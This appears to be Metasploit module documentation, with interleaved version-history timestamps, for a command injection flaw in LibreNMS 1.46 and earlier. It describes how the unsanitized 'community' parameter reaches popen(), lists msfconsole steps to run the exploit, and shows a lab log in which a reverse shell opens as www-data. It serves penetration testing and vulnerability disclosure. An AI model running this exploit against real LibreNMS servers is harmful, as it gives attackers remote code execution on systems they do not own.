2019-05-29 15:51:53 -05:00
## Description
In LibreNMS `v1.46` and below, there exists a command injection vulnerability in `capture.inc.php` .
The vulnerable functionality is intended to run a command such as `snmpwalk` and save the output as
a file. The `community` parameter is an unsanitized parameter retrieved through a POST request to `addhost` ,
and it is used to build the command that is executed in the `capture.inc.php` functionality. The final command
is passed to the `popen()` function, which results in execution of arbitrary code.
This module has been tested on LibreNMS `v1.46` and `v1.45` .
## Vulnerable Application
2019-05-29 18:30:39 -05:00
A [pre-built OVA ](https://github.com/librenms/packer-builds/releases/tag/1.46 ) can be downloaded via a LibreNMS repo.
Additionally, vulnerable versions of LibreNMS for Ubuntu can be manually installed using the instructions [here ](https://docs.librenms.org/Installation/Installation-Ubuntu-1804-Apache/ ).
2019-05-30 14:09:40 -05:00
In the command `composer create-project --no-dev --keep-vcs librenms/librenms librenms dev-master` , replace `dev-master` with a vulnerable version of the software, ex: `1.46` .
2019-05-29 15:51:53 -05:00
## Verification Steps
1. Install the application
2. Start msfconsole
2019-05-29 18:30:39 -05:00
3. Do: ```use exploit/linux/http/librenms_addhost_cmd_inject` ``
2019-05-29 15:51:53 -05:00
4. Do: ```set RHOSTS <ip>` ``
5. Do: ```set USERNAME <user>` ``
6. Do: ```set PASSWORD <pass>` ``
7. Do: ```run` ``
8. You should get a shell.
## Scenarios
### Tested on LibreNMS 1.46 on Ubuntu 18.04
```
2019-05-29 18:30:39 -05:00
msf5 > use exploit/linux/http/librenms_addhost_cmd_inject
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set rhosts 192.168.37.143
2019-05-29 15:51:53 -05:00
rhosts => 192.168.37.143
2019-05-29 18:30:39 -05:00
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set username blah
2019-05-29 15:51:53 -05:00
username => blah
2019-05-29 18:30:39 -05:00
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set password password
2019-05-29 15:51:53 -05:00
password => password
2019-05-29 18:30:39 -05:00
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set lhost 192.168.37.1
2019-05-29 15:51:53 -05:00
lhost => 192.168.37.1
2019-05-29 18:30:39 -05:00
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > run
2019-05-29 15:51:53 -05:00
[*] Started reverse TCP double handler on 192.168.37.1:4444
[*] Successfully logged into LibreNMS
[+] Successfully added device with hostname dFEzcH
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[+] Successfully deleted device with hostname dFEzcH and id #126
[*] Command: echo 38eJIFZsiRl3Er48;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "Trying: not found\r\nsh: 2: Connected: not found\r\nsh: 3: Escape: not found\r\n38eJIFZsiRl3Er48\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.143:55380) at 2019-05-29 15:26:02 -0500
whoami
www-data
uname -a
Linux ubuntu 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
` ``
